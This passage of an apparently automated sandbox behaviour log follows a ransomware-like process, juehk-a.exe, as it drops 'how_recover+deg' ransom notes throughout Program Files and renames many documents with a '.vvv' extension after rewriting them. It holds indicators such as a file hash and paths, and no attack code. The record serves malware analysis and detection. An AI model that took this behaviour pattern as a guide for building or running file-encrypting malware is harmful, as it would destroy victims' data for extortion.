24884.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24885.            ads:
24886.          fid (ads:): 562949953521416
24887.          ntstatus: 0x0
24888.          CreateOptions: 0x60
24889.        file:
24890.          timestamp: 88803
24891.          mode: created
24892.          sequenceNumber: 1754
24893.          value: C:\Program Files\Common Files\System\MSMAPI\1033\how_recover+deg.txt
24894.          processinfo:
24895.            pid: 1648
24896.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24897.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24898.            ads:
24899.          fid (ads:): 562949953521417
24900.          ntstatus: 0x0
24901.          CreateOptions: 0x60
24902.        file:
24903.          timestamp: 88809
24904.          mode: created
24905.          sequenceNumber: 1755
24906.          value: C:\Program Files\Common Files\System\MSMAPI\1033\how_recover+deg.html
24907.          processinfo:
24908.            pid: 1648
24909.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24910.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24911.            ads:
24912.          fid (ads:): 562949953521418
24913.          ntstatus: 0x0
24914.          CreateOptions: 0x60
24915.        file:
24916.          timestamp: 88815
24917.          mode: created
24918.          sequenceNumber: 1756
24919.          value: C:\Program Files\Common Files\System\MSMAPI\how_recover+deg.txt
24920.          processinfo:
24921.            pid: 1648
24922.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24923.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24924.            ads:
24925.          fid (ads:): 562949953521419
24926.          ntstatus: 0x0
24927.          CreateOptions: 0x60
24928.        file:
24929.          timestamp: 88821
24930.          mode: created
24931.          sequenceNumber: 1757
24932.          value: C:\Program Files\Common Files\System\MSMAPI\how_recover+deg.html
24933.          processinfo:
24934.            pid: 1648
24935.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24936.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24937.            ads:
24938.          fid (ads:): 562949953521420
24939.          ntstatus: 0x0
24940.          CreateOptions: 0x60
24941.        file:
24942.          timestamp: 88838
24943.          mode: created
24944.          sequenceNumber: 1758
24945.          value: C:\Program Files\Common Files\System\Ole DB\en-US\how_recover+deg.txt
24946.          processinfo:
24947.            pid: 1648
24948.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24949.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24950.            ads:
24951.          fid (ads:): 562949953521421
24952.          ntstatus: 0x0
24953.          CreateOptions: 0x60
24954.        file:
24955.          timestamp: 88844
24956.          mode: created
24957.          sequenceNumber: 1759
24958.          value: C:\Program Files\Common Files\System\Ole DB\en-US\how_recover+deg.html
24959.          processinfo:
24960.            pid: 1648
24961.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24962.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24963.            ads:
24964.          fid (ads:): 562949953521422
24965.          ntstatus: 0x0
24966.          CreateOptions: 0x60
24967.        file:
24968.          timestamp: 88851
24969.          mode: created
24970.          sequenceNumber: 1760
24971.          value: C:\Program Files\Common Files\System\Ole DB\how_recover+deg.txt
24972.          processinfo:
24973.            pid: 1648
24974.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24975.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24976.            ads:
24977.          fid (ads:): 562949953521423
24978.          ntstatus: 0x0
24979.          CreateOptions: 0x60
24980.        file:
24981.          timestamp: 88857
24982.          mode: created
24983.          sequenceNumber: 1761
24984.          value: C:\Program Files\Common Files\System\Ole DB\how_recover+deg.html
24985.          processinfo:
24986.            pid: 1648
24987.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24988.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24989.            ads:
24990.          fid (ads:): 562949953521424
24991.          ntstatus: 0x0
24992.          CreateOptions: 0x60
24993.        file:
24994.          timestamp: 88863
24995.          mode: created
24996.          sequenceNumber: 1762
24997.          value: C:\Program Files\Common Files\System\how_recover+deg.txt
24998.          processinfo:
24999.            pid: 1648
25000.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25001.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25002.            ads:
25003.          fid (ads:): 562949953521425
25004.          ntstatus: 0x0
25005.          CreateOptions: 0x60
25006.        file:
25007.          timestamp: 88868
25008.          mode: created
25009.          sequenceNumber: 1763
25010.          value: C:\Program Files\Common Files\System\how_recover+deg.html
25011.          processinfo:
25012.            pid: 1648
25013.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25014.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25015.            ads:
25016.          fid (ads:): 562949953521426
25017.          ntstatus: 0x0
25018.          CreateOptions: 0x60
25019.        file:
25020.          timestamp: 88884
25021.          mode: created
25022.          sequenceNumber: 1764
25023.          value: C:\Program Files\Common Files\how_recover+deg.txt
25024.          processinfo:
25025.            pid: 1648
25026.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25027.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25028.            ads:
25029.          fid (ads:): 562949953521427
25030.          ntstatus: 0x0
25031.          CreateOptions: 0x60
25032.        file:
25033.          timestamp: 88891
25034.          mode: created
25035.          sequenceNumber: 1765
25036.          value: C:\Program Files\Common Files\how_recover+deg.html
25037.          processinfo:
25038.            pid: 1648
25039.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25040.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25041.            ads:
25042.          fid (ads:): 562949953521428
25043.          ntstatus: 0x0
25044.          CreateOptions: 0x60
25045.        file:
25046.          timestamp: 88897
25047.          mode: created
25048.          sequenceNumber: 1766
25049.          value: C:\Program Files\Debugging Tools for Windows (x64)\1394\how_recover+deg.txt
25050.          processinfo:
25051.            pid: 1648
25052.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25053.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25054.            ads:
25055.          fid (ads:): 562949953521429
25056.          ntstatus: 0x0
25057.          CreateOptions: 0x60
25058.        file:
25059.          timestamp: 88904
25060.          mode: created
25061.          sequenceNumber: 1767
25062.          value: C:\Program Files\Debugging Tools for Windows (x64)\1394\how_recover+deg.html
25063.          processinfo:
25064.            pid: 1648
25065.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25066.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25067.            ads:
25068.          fid (ads:): 562949953521430
25069.          ntstatus: 0x0
25070.          CreateOptions: 0x60
25071.        file:
25072.          timestamp: 88911
25073.          mode: open
25074.          sequenceNumber: 1768
25075.          value: C:\Program Files\Debugging Tools for Windows (x64)\adplus.doc
25076.          filesize: 71168
25077.          processinfo:
25078.            pid: 1648
25079.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25080.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25081.            ads:
25082.          fid (ads:): 562949953520408
25083.          ntstatus: 0x0
25084.          CreateOptions: 0x60
25085.        file:
25086.          timestamp: 88941
25087.          mode: rename
25088.          sequenceNumber: 1769
25089.          filesize: 71598
25090.          processinfo:
25091.            pid: 1648
25092.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25093.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25094.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\adplus.doc
25095.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\adplus.doc.vvv
25096.            ads:
25097.          fid (ads:): 562949953520408
25098.          ntstatus: 0x0
25099.          CreateOptions: 0x0
25100.        file:
25101.          timestamp: 88949
25102.          mode: open
25103.          sequenceNumber: 1770
25104.          value: C:\Program Files\Debugging Tools for Windows (x64)\dml.doc
25105.          filesize: 56832
25106.          processinfo:
25107.            pid: 1648
25108.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25109.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25110.            ads:
25111.          fid (ads:): 562949953520426
25112.          ntstatus: 0x0
25113.          CreateOptions: 0x60
25114.        file:
25115.          timestamp: 88959
25116.          mode: rename
25117.          sequenceNumber: 1771
25118.          filesize: 57262
25119.          processinfo:
25120.            pid: 1648
25121.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25122.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25123.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\dml.doc
25124.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\dml.doc.vvv
25125.            ads:
25126.          fid (ads:): 562949953520426
25127.          ntstatus: 0x0
25128.          CreateOptions: 0x0
25129.        file:
25130.          timestamp: 88967
25131.          mode: open
25132.          sequenceNumber: 1772
25133.          value: C:\Program Files\Debugging Tools for Windows (x64)\kernel_debugging_tutorial.doc
25134.          filesize: 1196032
25135.          processinfo:
25136.            pid: 1648
25137.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25138.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25139.            ads:
25140.          fid (ads:): 562949953520436
25141.          ntstatus: 0x0
25142.          CreateOptions: 0x60
25143.        file:
25144.          timestamp: 89083
25145.          mode: rename
25146.          sequenceNumber: 1773
25147.          filesize: 1196462
25148.          processinfo:
25149.            pid: 1648
25150.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25151.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25152.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\kernel_debugging_tutorial.doc
25153.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\kernel_debugging_tutorial.doc.vvv
25154.            ads:
25155.          fid (ads:): 562949953520436
25156.          ntstatus: 0x0
25157.          CreateOptions: 0x0
25158.        file:
25159.          timestamp: 89090
25160.          mode: open
25161.          sequenceNumber: 1774
25162.          value: C:\Program Files\Debugging Tools for Windows (x64)\license.txt
25163.          filesize: 10237
25164.          processinfo:
25165.            pid: 1648
25166.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25167.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25168.            ads:
25169.          fid (ads:): 562949953520438
25170.          ntstatus: 0x0
25171.          CreateOptions: 0x60
25172.        file:
25173.          timestamp: 89148
25174.          mode: rename
25175.          sequenceNumber: 1775
25176.          filesize: 10654
25177.          processinfo:
25178.            pid: 1648
25179.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25180.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25181.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\license.txt
25182.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\license.txt.vvv
25183.            ads:
25184.          fid (ads:): 562949953520438
25185.          ntstatus: 0x0
25186.          CreateOptions: 0x0
25187.        file:
25188.          timestamp: 89168
25189.          mode: open
25190.          sequenceNumber: 1776
25191.          value: C:\Program Files\Debugging Tools for Windows (x64)\redist.txt
25192.          filesize: 2819
25193.          processinfo:
25194.            pid: 1648
25195.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25196.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25197.            ads:
25198.          fid (ads:): 562949953520444
25199.          ntstatus: 0x0
25200.          CreateOptions: 0x60
25201.        file:
25202.          timestamp: 89250
25203.          mode: rename
25204.          sequenceNumber: 1777
25205.          filesize: 3246
25206.          processinfo:
25207.            pid: 1648
25208.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25209.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25210.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\redist.txt
25211.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\redist.txt.vvv
25212.            ads:
25213.          fid (ads:): 562949953520444
25214.          ntstatus: 0x0
25215.          CreateOptions: 0x0
25216.        file:
25217.          timestamp: 89256
25218.          mode: open
25219.          sequenceNumber: 1778
25220.          value: C:\Program Files\Debugging Tools for Windows (x64)\relnotes.txt
25221.          filesize: 12615
25222.          processinfo:
25223.            pid: 1648
25224.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25225.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25226.            ads:
25227.          fid (ads:): 562949953520445
25228.          ntstatus: 0x0
25229.          CreateOptions: 0x60
25230.        file:
25231.          timestamp: 89289
25232.          mode: rename
25233.          sequenceNumber: 1779
25234.          filesize: 13038
25235.          processinfo:
25236.            pid: 1648
25237.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25238.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25239.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\relnotes.txt
25240.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\relnotes.txt.vvv
25241.            ads:
25242.          fid (ads:): 562949953520445
25243.          ntstatus: 0x0
25244.          CreateOptions: 0x0
25245.        file:
25246.          timestamp: 89353
25247.          mode: created
25248.          sequenceNumber: 1780
25249.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\help\how_recover+deg.txt
25250.          processinfo:
25251.            pid: 1648
25252.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25253.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25254.            ads:
25255.          fid (ads:): 562949953521431
25256.          ntstatus: 0x0
25257.          CreateOptions: 0x60
25258.        file:
25259.          timestamp: 89362
25260.          mode: created
25261.          sequenceNumber: 1781
25262.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\help\how_recover+deg.html
25263.          processinfo:
25264.            pid: 1648
25265.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25266.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25267.            ads:
25268.          fid (ads:): 562949953521432
25269.          ntstatus: 0x0
25270.          CreateOptions: 0x60
25271.        file:
25272.          timestamp: 89397
25273.          mode: created
25274.          sequenceNumber: 1782
25275.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\inc\how_recover+deg.txt
25276.          processinfo:
25277.            pid: 1648
25278.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25279.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25280.            ads:
25281.          fid (ads:): 562949953521433
25282.          ntstatus: 0x0
25283.          CreateOptions: 0x60
25284.        file:
25285.          timestamp: 89402
25286.          mode: created
25287.          sequenceNumber: 1783
25288.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\inc\how_recover+deg.html
25289.          processinfo:
25290.            pid: 1648
25291.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25292.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25293.            ads:
25294.          fid (ads:): 562949953521434
25295.          ntstatus: 0x0
25296.          CreateOptions: 0x60
25297.        file:
25298.          timestamp: 89412
25299.          mode: created
25300.          sequenceNumber: 1784
25301.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\amd64\how_recover+deg.txt
25302.          processinfo:
25303.            pid: 1648
25304.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25305.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25306.            ads:
25307.          fid (ads:): 562949953521435
25308.          ntstatus: 0x0
25309.          CreateOptions: 0x60
25310.        file:
25311.          timestamp: 89416
25312.          mode: created
25313.          sequenceNumber: 1785
25314.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\amd64\how_recover+deg.html
25315.          processinfo:
25316.            pid: 1648
25317.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25318.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25319.            ads:
25320.          fid (ads:): 562949953521436
25321.          ntstatus: 0x0
25322.          CreateOptions: 0x60
25323.        file:
25324.          timestamp: 89421
25325.          mode: created
25326.          sequenceNumber: 1786
25327.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\i386\how_recover+deg.txt
25328.          processinfo:
25329.            pid: 1648
25330.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25331.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25332.            ads:
25333.          fid (ads:): 562949953521437
25334.          ntstatus: 0x0
25335.          CreateOptions: 0x60
25336.        file:
25337.          timestamp: 89427
25338.          mode: created
25339.          sequenceNumber: 1787
25340.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\i386\how_recover+deg.html
25341.          processinfo:
25342.            pid: 1648
25343.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25344.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25345.            ads:
25346.          fid (ads:): 562949953521438
25347.          ntstatus: 0x0
25348.          CreateOptions: 0x60
25349.        file:
25350.          timestamp: 89434
25351.          mode: created
25352.          sequenceNumber: 1788
25353.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\ia64\how_recover+deg.txt
25354.          processinfo:
25355.            pid: 1648
25356.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25357.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25358.            ads:
25359.          fid (ads:): 562949953521439
25360.          ntstatus: 0x0
25361.          CreateOptions: 0x60
25362.        file:
25363.          timestamp: 89454
25364.          mode: created
25365.          sequenceNumber: 1789
25366.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\ia64\how_recover+deg.html
25367.          processinfo:
25368.            pid: 1648
25369.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25370.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25371.            ads:
25372.          fid (ads:): 562949953521440
25373.          ntstatus: 0x0
25374.          CreateOptions: 0x60
25375.        file:
25376.          timestamp: 89461
25377.          mode: created
25378.          sequenceNumber: 1790
25379.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\how_recover+deg.txt
25380.          processinfo:
25381.            pid: 1648
25382.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25383.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25384.            ads:
25385.          fid (ads:): 562949953521441
25386.          ntstatus: 0x0
25387.          CreateOptions: 0x60
25388.        file:
25389.          timestamp: 89467
25390.          mode: created
25391.          sequenceNumber: 1791
25392.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\how_recover+deg.html
25393.          processinfo:
25394.            pid: 1648
25395.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25396.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25397.            ads:
25398.          fid (ads:): 562949953521442
25399.          ntstatus: 0x0
25400.          CreateOptions: 0x60
25401.        file:
25402.          timestamp: 89623
25403.          mode: created
25404.          sequenceNumber: 1792
25405.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\adp_ext\how_recover+deg.txt
25406.          processinfo:
25407.            pid: 1648
25408.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25409.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25410.            ads:
25411.          fid (ads:): 562949953521443
25412.          ntstatus: 0x0
25413.          CreateOptions: 0x60
25414.        file:
25415.          timestamp: 89630
25416.          mode: created
25417.          sequenceNumber: 1793
25418.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\adp_ext\how_recover+deg.html
25419.          processinfo:
25420.            pid: 1648
25421.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25422.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25423.            ads:
25424.          fid (ads:): 562949953521444
25425.          ntstatus: 0x0
25426.          CreateOptions: 0x60
25427.        file:
25428.          timestamp: 89637
25429.          mode: created
25430.          sequenceNumber: 1794
25431.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\analyze_continue\how_recover+deg.txt
25432.          processinfo:
25433.            pid: 1648
25434.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25435.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25436.            ads:
25437.          fid (ads:): 562949953521445
25438.          ntstatus: 0x0
25439.          CreateOptions: 0x60
25440.        file:
25441.          timestamp: 89658
25442.          mode: open
25443.          sequenceNumber: 1795
25444.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\extcpp\readme.txt
25445.          filesize: 496
25446.          processinfo:
25447.            pid: 1648
25448.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25449.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25450.            ads:
25451.          fid (ads:): 562949953520501
25452.          ntstatus: 0x0
25453.          CreateOptions: 0x60
25454.        file:
25455.          timestamp: 89668
25456.          mode: rename
25457.          sequenceNumber: 1796
25458.          filesize: 926
25459.          processinfo:
25460.            pid: 1648
25461.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25462.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25463.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\extcpp\readme.txt
25464.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\extcpp\readme.txt.vvv
25465.            ads:
25466.          fid (ads:): 562949953520501
25467.          ntstatus: 0x0
25468.          CreateOptions: 0x0
25469.        file:
25470.          timestamp: 89688
25471.          mode: open
25472.          sequenceNumber: 1797
25473.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\exts\readme.txt
25474.          filesize: 4423
25475.          processinfo:
25476.            pid: 1648
25477.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25478.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25479.            ads:
25480.          fid (ads:): 562949953520510
25481.          ntstatus: 0x0
25482.          CreateOptions: 0x60
25483.        file:
25484.          timestamp: 89698
25485.          mode: rename
25486.          sequenceNumber: 1798
25487.          filesize: 4846
25488.          processinfo:
25489.            pid: 1648
25490.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25491.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25492.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\exts\readme.txt
25493.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\exts\readme.txt.vvv
25494.            ads:
25495.          fid (ads:): 562949953520510
25496.          ntstatus: 0x0
25497.          CreateOptions: 0x0
25498.        file:
25499.          timestamp: 89708
25500.          mode: open
25501.          sequenceNumber: 1799
25502.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\readme.txt
25503.          filesize: 3458
25504.          processinfo:
25505.            pid: 1648
25506.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25507.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25508.            ads:
25509.          fid (ads:): 562949953520524
25510.          ntstatus: 0x0
25511.          CreateOptions: 0x60
25512.        file:
25513.          timestamp: 89717
25514.          mode: rename
25515.          sequenceNumber: 1800
25516.          filesize: 3886
25517.          processinfo:
25518.            pid: 1648
25519.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25520.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25521.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\readme.txt
25522.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\readme.txt.vvv
25523.            ads:
25524.          fid (ads:): 562949953520524
25525.          ntstatus: 0x0
25526.          CreateOptions: 0x0
25527.        file:
25528.          timestamp: 89894
25529.          mode: open
25530.          sequenceNumber: 1801
25531.          value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\simplext\readme.txt
25532.          filesize: 2952
25533.          processinfo:
25534.            pid: 1648
25535.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25536.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25537.            ads:
25538.          fid (ads:): 562949953520532
25539.          ntstatus: 0x0
25540.          CreateOptions: 0x60
25541.        file:
25542.          timestamp: 89914
25543.          mode: rename
25544.          sequenceNumber: 1802
25545.          filesize: 3374
25546.          processinfo:
25547.            pid: 1648
25548.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25549.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25550.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\simplext\readme.txt
25551.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\simplext\readme.txt.vvv
25552.            ads:
25553.          fid (ads:): 562949953520532
25554.          ntstatus: 0x0
25555.          CreateOptions: 0x0
25556.        apicall:
25557.          timestamp: 89943
25558.          repeat: 8000
25559.          sequenceNumber: 1803
25560.          processinfo:
25561.            pid: 1648
25562.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25563.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25564.          dllname: kernel32.dll
25565.          apiname: Sleep
25566.          address: 0x0041ed5b
25567.        file:
25568.          timestamp: 89956
25569.          mode: open
25570.          sequenceNumber: 1804
25571.          value: C:\Program Files\Debugging Tools for Windows (x64)\srcsrv\srcsrv.doc
25572.          filesize: 111104
25573.          processinfo:
25574.            pid: 1648
25575.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25576.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25577.            ads:
25578.          fid (ads:): 562949953520542
25579.          ntstatus: 0x0
25580.          CreateOptions: 0x60
25581.        file:
25582.          timestamp: 90004
25583.          mode: rename
25584.          sequenceNumber: 1805
25585.          filesize: 111534
25586.          processinfo:
25587.            pid: 1648
25588.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25589.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25590.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\srcsrv\srcsrv.doc
25591.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\srcsrv\srcsrv.doc.vvv
25592.            ads:
25593.          fid (ads:): 562949953520542
25594.          ntstatus: 0x0
25595.          CreateOptions: 0x0
25596.        file:
25597.          timestamp: 90012
25598.          mode: open
25599.          sequenceNumber: 1806
25600.          value: C:\Program Files\Debugging Tools for Windows (x64)\symproxy\symhttp.doc
25601.          filesize: 281600
25602.          processinfo:
25603.            pid: 1648
25604.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25605.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25606.            ads:
25607.          fid (ads:): 562949953520558
25608.          ntstatus: 0x0
25609.          CreateOptions: 0x60
25610.        file:
25611.          timestamp: 90046
25612.          mode: rename
25613.          sequenceNumber: 1807
25614.          filesize: 282030
25615.          processinfo:
25616.            pid: 1648
25617.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25618.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25619.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\symproxy\symhttp.doc
25620.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\symproxy\symhttp.doc.vvv
25621.            ads:
25622.          fid (ads:): 562949953520558
25623.          ntstatus: 0x0
25624.          CreateOptions: 0x0
25625.        file:
25626.          timestamp: 90072
25627.          mode: open
25628.          sequenceNumber: 1808
25629.          value: C:\Program Files\Debugging Tools for Windows (x64)\themes\themes.doc
25630.          filesize: 550912
25631.          processinfo:
25632.            pid: 1648
25633.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25634.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25635.            ads:
25636.          fid (ads:): 562949953520578
25637.          ntstatus: 0x0
25638.          CreateOptions: 0x60
25639.        file:
25640.          timestamp: 90113
25641.          mode: rename
25642.          sequenceNumber: 1809
25643.          filesize: 551342
25644.          processinfo:
25645.            pid: 1648
25646.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25647.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25648.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\themes\themes.doc
25649.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\themes\themes.doc.vvv
25650.            ads:
25651.          fid (ads:): 562949953520578
25652.          ntstatus: 0x0
25653.          CreateOptions: 0x0
25654.        file:
25655.          timestamp: 90123
25656.          mode: open
25657.          sequenceNumber: 1810
25658.          value: C:\Program Files\Debugging Tools for Windows (x64)\triage\pooltag.txt
25659.          filesize: 157018
25660.          processinfo:
25661.            pid: 1648
25662.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25663.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25664.            ads:
25665.          fid (ads:): 562949953520581
25666.          ntstatus: 0x0
25667.          CreateOptions: 0x60
25668.        file:
25669.          timestamp: 90135
25670.          mode: rename
25671.          sequenceNumber: 1811
25672.          filesize: 157438
25673.          processinfo:
25674.            pid: 1648
25675.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25676.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25677.          old_name: C:\Program Files\Debugging Tools for Windows (x64)\triage\pooltag.txt
25678.          new_name: C:\Program Files\Debugging Tools for Windows (x64)\triage\pooltag.txt.vvv
25679.            ads:
25680.          fid (ads:): 562949953520581
25681.          ntstatus: 0x0
25682.          CreateOptions: 0x0
25683.        file:
25684.          timestamp: 90225
25685.          mode: failed
25686.          sequenceNumber: 1812
